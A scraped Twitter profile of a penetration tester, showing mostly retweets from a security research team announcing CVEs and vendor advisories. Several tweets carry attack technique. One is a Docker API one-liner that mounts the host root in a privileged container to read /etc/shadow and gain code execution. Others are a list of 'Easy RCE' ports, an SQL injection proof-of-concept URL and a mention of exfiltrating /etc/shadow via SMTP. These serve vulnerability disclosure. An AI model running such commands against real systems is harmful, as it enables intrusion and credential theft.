Alexandr Shvetsov (@shvetsovalex007) 's Twitter Profile
Alexandr Shvetsov

@shvetsovalex007

Penetration Tester at @ptsecurity

ID: 767397969171718145

calendar_today21-08-2016 16:28:28

41 Tweet

187 Followers

63 Following

PT SWARM (@ptswarm) 's Twitter Profile Photo

New attack! Our researcher Arseniy Sharoglazov has discovered a method to connect to LDAP via #MSExchange from the Internet and access the whole Active Directory database. Read the research: swarm.ptsecurity.com/attacking-ms-e…

New attack! Our researcher Arseniy Sharoglazov has discovered a method to connect to LDAP via #MSExchange from the Internet and access the whole Active Directory database. Read the research: swarm.ptsecurity.com/attacking-ms-e…
PT SWARM (@ptswarm) 's Twitter Profile Photo

OpenFire allows to get Arbitrary File Read and Unauthenticated Full Read SSRF via its 9090/http and 9091/https ports. The details are in the article by Alexandr Shvetsov (CVE-2019-18393 & CVE-2019-18394): swarm.ptsecurity.com/openfire-admin…

OpenFire allows to get Arbitrary File Read and Unauthenticated Full Read SSRF via its 9090/http and 9091/https ports. The details are in the article by Alexandr Shvetsov (CVE-2019-18393 & CVE-2019-18394): swarm.ptsecurity.com/openfire-admin…
PT SWARM (@ptswarm) 's Twitter Profile Photo

The advisory for an Unauthenticated Arbitrary File Read vulnerability in Citrix XenMobile (CVE-2020-8209) found by our researcher Andrey Medov is now out! The fixes were released privately 3 weeks ago, so we hope a lot of companies are protected now 🙂 support.citrix.com/article/CTX277…

The advisory for an Unauthenticated Arbitrary File Read vulnerability in Citrix XenMobile (CVE-2020-8209) found by our researcher Andrey Medov is now out! The fixes were released privately 3 weeks ago, so we hope a lot of companies are protected now 🙂 support.citrix.com/article/CTX277…
PT SWARM (@ptswarm) 's Twitter Profile Photo

We are releasing an article about an Authenticated Arbitrary File Read vulnerability (CVE-2019-19499) in Grafana! Dive into Go SQL client libraries, quirks of the MySQL protocol, and more! swarm.ptsecurity.com/grafana-6-4-3-…

PT SWARM (@ptswarm) 's Twitter Profile Photo

The advisory for an authenticated Java Deserialization vulnerability in IBM Maximo (CVE-2020-4521), found by our researchers Andrey Medov & Arseniy Sharoglazov, is now out! ibm.com/support/pages/…

The advisory for an authenticated Java Deserialization vulnerability in IBM Maximo (CVE-2020-4521), found by our researchers Andrey Medov & Arseniy Sharoglazov, is now out!

ibm.com/support/pages/…
PT SWARM (@ptswarm) 's Twitter Profile Photo

Checkpoint patched a vulnerability in a Gaia OS component (CVE-2020-6020) discovered by our researchers Mikhail Klyuchnikov & Nikita Abramov. Argument Injection led to Arbitrary File Reading with root privileges and DoS. supportcenter.checkpoint.com/supportcenter/…

Checkpoint patched a vulnerability in a Gaia OS component (CVE-2020-6020) discovered by our researchers Mikhail Klyuchnikov & Nikita Abramov. Argument Injection led to Arbitrary File Reading with root privileges and DoS.

supportcenter.checkpoint.com/supportcenter/…
PT SWARM (@ptswarm) 's Twitter Profile Photo

💥Easy RCE Ports Java RMI: 1090,1098,1099,4444,11099,47001,47002,10999 WebLogic: 7000-7004,8000-8003,9000-9003,9503,7070,7071 JDWP: 45000,45001 JMX: 8686,9012,50500 GlassFish: 4848 jBoss: 11111,4444,4445 Cisco Smart Install: 4786 HP Data Protector: 5555,5556 #ptswarmTechniques

💥Easy RCE Ports

Java RMI: 1090,1098,1099,4444,11099,47001,47002,10999
WebLogic: 7000-7004,8000-8003,9000-9003,9503,7070,7071
JDWP: 45000,45001
JMX: 8686,9012,50500
GlassFish: 4848
jBoss: 11111,4444,4445
Cisco Smart Install: 4786
HP Data Protector: 5555,5556

#ptswarmTechniques
PT SWARM (@ptswarm) 's Twitter Profile Photo

11 SonicWall CVE-s 460.000 hosts by shodan 1 researcher - Nikita Abramov Stack Overflow, Heap Overflow, Memory Leak and more! CVE-2020-5133,34,...,43 CVSS: 9.4 to 5.3 Update your systems! 👉psirt.global.sonicwall.com/vuln-list

11 SonicWall CVE-s 
460.000 hosts by shodan
1 researcher - Nikita Abramov

Stack Overflow, Heap Overflow, Memory Leak and more!

CVE-2020-5133,34,...,43
CVSS: 9.4 to 5.3

Update your systems!

👉psirt.global.sonicwall.com/vuln-list
PT SWARM (@ptswarm) 's Twitter Profile Photo

💉Advanced MSSQL Injection Tricks💉 🩸 New DNS Out-Of-Band vector in SELECT statement 🩸 Quick exploitation: Get all table data in one query 🩸 Read local files in SELECT statement and more! Read the article: swarm.ptsecurity.com/advanced-mssql…

PT SWARM (@ptswarm) 's Twitter Profile Photo

Checkpoint ICA Management Tool (CVE-2020-6020) research by Mikhail Klyuchnikov & Nikita Abramov. 1⃣Send /etc/shadow to yourself via SMTP 2⃣Simple DoS swarm.ptsecurity.com/vulnerabilitie…

Checkpoint ICA Management Tool (CVE-2020-6020) research by Mikhail Klyuchnikov & Nikita Abramov.

1⃣Send /etc/shadow to yourself via SMTP
2⃣Simple DoS

swarm.ptsecurity.com/vulnerabilitie…
PT SWARM (@ptswarm) 's Twitter Profile Photo

💥Easy RCE using Docker API on port 2375/tcp docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine File Access: cat /mnt/etc/shadow RCE: chroot /mnt #ptswarmTechniques

💥Easy RCE using Docker API on port 2375/tcp

docker -H &lt;host&gt;:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
RCE: chroot /mnt

#ptswarmTechniques
PT SWARM (@ptswarm) 's Twitter Profile Photo

VMware fixed a Post-Auth RCE in vSphere Replication (CVE-2021-21976) found by our researcher Egor Dimitrenko. Advisory: vmware.com/security/advis…

VMware fixed a Post-Auth RCE in vSphere Replication (CVE-2021-21976) found by our researcher Egor Dimitrenko.

Advisory: vmware.com/security/advis…
PT SWARM (@ptswarm) 's Twitter Profile Photo

SonicWall fixed a Post-Auth RCE (CVE-2021-20026) in Network Security Manager and an Unauth Buffer Overflow (CVE-2021-20027) in SonicOS found by our researcher Nikita Abramov. Advisory: psirt.global.sonicwall.com/vuln-detail/SN…

SonicWall fixed a Post-Auth RCE (CVE-2021-20026) in Network Security Manager and an Unauth Buffer Overflow (CVE-2021-20027) in SonicOS found by our researcher Nikita Abramov.

Advisory: psirt.global.sonicwall.com/vuln-detail/SN…
PT SWARM (@ptswarm) 's Twitter Profile Photo

🐞PoC for a boolean-based #SQLi in Rapid7 Nexpose <= 6.6.48 (CVE-2020-7383) https://nexpose.local:3780/data/discoveryAsset/config/folderPath?path=[sqli]

🐞PoC for a boolean-based #SQLi in Rapid7 Nexpose &lt;= 6.6.48 (CVE-2020-7383)

https://nexpose.local:3780/data/discoveryAsset/config/folderPath?path=[sqli]
PT SWARM (@ptswarm) 's Twitter Profile Photo

🚨RCE on a backend IIS server via file upload with an atypical file extension. 📋More community curated payloads can be found at github.com/swisskyrepo/Pa… #tipstoknow

🚨RCE on a backend IIS server via file upload with an atypical file extension.

📋More community curated payloads can be found at github.com/swisskyrepo/Pa…

#tipstoknow
PT SWARM (@ptswarm) 's Twitter Profile Photo

New article: "Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings" Read more about critical vulnerabilities (CVSS 9.8, 7.3 and 5.3) found by our researchers markmark & @__mn1__ : swarm.ptsecurity.com/cisco-hyperfle…

New article: "Cisco Hyperflex: How We Got RCE Through Login Form and Other Findings"

Read more about critical vulnerabilities (CVSS 9.8, 7.3 and  5.3) found by our researchers <a href="/Ankorik/">markmark</a> &amp; @__mn1__ :

swarm.ptsecurity.com/cisco-hyperfle…
PT SWARM (@ptswarm) 's Twitter Profile Photo

🔥 We have reproduced the fresh CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49. If files outside of the document root are not protected by "require all denied" these requests can succeed. Patch ASAP! httpd.apache.org/security/vulne…

🔥 We have reproduced the fresh CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.

If files outside of the document root are not protected by "require all denied" these requests can succeed.

Patch ASAP! 

httpd.apache.org/security/vulne…